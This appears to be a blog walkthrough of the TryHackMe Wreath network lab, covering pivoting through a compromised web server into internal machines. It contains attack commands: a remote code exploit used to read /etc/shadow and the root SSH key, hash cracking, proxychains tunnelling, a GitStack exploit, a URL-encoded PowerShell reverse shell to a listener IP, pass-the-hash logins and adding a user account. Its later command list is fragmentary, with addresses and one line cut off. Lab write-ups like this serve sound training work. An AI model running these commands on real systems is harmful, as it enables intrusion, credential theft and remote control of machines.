Skip to content

Complete TryHackMe Wreath Network Writeup

TryHackMe Wreath Network WriteUp

TryHackMe Wreath Network Walkthrough help you learn how to pivot through a network by compromising a public facing web machine and tunnelling your traffic to access other machines in Wreath’s network. (Streak limitation only for non-subscribed users).

Access Wreath Network

Go to and download your VPN config file.

Access Wreath Network
Wreath Network

TryHackMe Wreath Walkthrough

TryHackMe Wreath Network

TryHackMe Wreath Network

Before starting lets create a folder to store all our files.

mkdir /home/kali/TryHackMe_Wreath

Enter the project folder:

cd /home/kali/TryHackMe_Wreath

Attacking Prod-Server

The production server is a Linux host lets use nmap to scan for open ports and verify what services are running.

Scan the Host

Scan the prod-server using nmap and verify services running on remote machine.

nmap -sC -sV --script=vuln
Complete TryHackMe Wreath Network Writeup 47

Interesting result the server is running an old WebAdmin version on port 10000.

Complete TryHackMe Wreath Network Writeup 48

Open Google and search exploit for Web Admin

search webadmin 1.890

Download Exploit from here:


Exploit WebAdmin 1.890 arguments options:

Execute the python script and verity the system process and user.

python3 10000 "id;whoami"

After verify we are root let’s work to get remote access on the machine, execute the same script but now reading the /etc/passwd file:

python3 10000 "cat /etc/passwd"

Now we have a list of system users we can use, notice the user twreath what is his password hash?

python3 10000 "cat /etc/shadow"

Great we have two user password hashs, let’s crack them.



Save both at password_hashes.txt

Crack The Hashes

Passing the hahs file into john without more arguments john will auto detected the encryption type.

john passwds_hashes.txt

Verify if john crack any password:

john --show

No success cracking the hashes?

If it was possible to read shadow file maybe it is possible to extract the root SSH RSA private key, let’s try it!

Extract SSH Keys

Root SSH RSA Key

python3 10000 "cat /root/.ssh/id_rsa"
Complete TryHackMe Wreath Network Writeup 49

copy the key content into the file prod-server.rsa and define the correct permissions

chmod 6000 prod-server.rsa

Login In into Prod-Server

Now we can login into our production server, here I will connect throught SSH creating an socks5 proxy on port 19850. This proxy will allow us to access all networks and hosts prod-server can access.

ssh -i /home/kali/Wreath/prod-server.rsa root@ -D 19850

We are In as root 😀

Attack Prod-Server Descrition

We start scanning the host prod-server with nmap and detect a vulnerable version of WebAdmin running on port 10000. Then we search for a public exploit on google and use it to get a RCE on remote server, with the script we were able to extract the root SSH RSA Key and login as root into the prod-server and create a socks5 proxy.

Attacking Git Server

Its time to attack the git Server but before that let’s configure our proxychains to be able to use any tool against git-server.

If you want to use proxychains strict mode comment the socks4 entry and add only Socks5.

sudo echo "socks5 19850" >> /etc/proxychains4.conf

An SSH Proxy tunnel can give us alote of flexibility when we are pivoting inside a network we can keep a secure tunnel between our comprimised machine and access any service on the network.

Using SSH and Proxychains

If we want to access git server directly from out browser we need to setup FoxyProxy to use our new socks5 proxy created with SSH tunnel.

Now we can access the Git Server directly in our browser.

Remember any tool we use to attack the Git Server we need to use our local Socks5 proxy ( created with our SSH Tunnel into prod-server host.

After configuring the FoxyProxy to use our proxy open the git server IP on browser.

We will have an error page but notice have some juice info, it is using Django and mentioned some new directories. Let’s investigate it!

Scan Git Server with Nmap

proxychains4 nmap --top-ports 1023 -sT  -n -PS --script=vuln

As we know gitstack is running on port 80, let’s search for an exploit using searchsploit tool.

searchsploit gitstack

We found 3 possible GitStack exploits, let’s copy the third one into our current folder:

searchsploit -m php/webapps/
proxychains4 python
proxychains4 curl -X POST -d 'username=RFS;password=RFS'
proxychains4 ruby /home/kali/evil-winrm/evil-winrm.rb -u RFS -p RFS -i
proxychains4 ruby /home/kali/evil-winrm/evil-winrm.rb -u Admnistrator -H 37db63-RFS-a8461e05c-RFS -i
proxychains4 xfreerdp /v: /u:RFS /p:RFS +clipboard /dynamic-resolution /drive:/home/kali/TryHackMe_Wreath/share
firewall-cmd --zone=public --add-port 19850/tcp
firewall-cmd --zone=public --add-port 19851/tcp
scp -i key socat root@
./tmp/socat-rfs tcp-l:19851,fork,reuseaddr tcp:
proxychains4 curl -X POST -d 'a=powershell%20-nop%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient%28%2710.200.193.200%27%2C19850%29%3B%24stream%20%3D%20%24client.GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile%28%28%24i%20%3D%20%24stream.Read%28%24bytes%2C%200%2C%20%24bytes.Length%29%29%20-ne%200%29%7B%3B%24data%20%3D%20%28New-Object%20-TypeName%20System.Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C%20%24i%29%3B%24sendback%20%3D%20%28iex%20%24data%202%3E%261%20%7C%20Out-String%20%29%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20%28pwd%29.Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22'
mkdir /home/kali/TryHackMe_Wreath/share
proxychains4 xfreerdp /v: /u:RFS /p:RFS +clipboard /dynamic-resolution /drive:/home/kali/TryHackMe_Wreath/share

Send Mimikatz trough file share or SCP

proxychains4 curl -X POST -d 'a=whoami'
proxychains4 curl -X POST -d 'a=net user RFS RFS /add'


Attacking WREATH-PC
Username: Thomas
Password - Crack the Hash
powershell.exe -c "(new-object

Linux Privilege Escalation

TryHackMe Wreath Network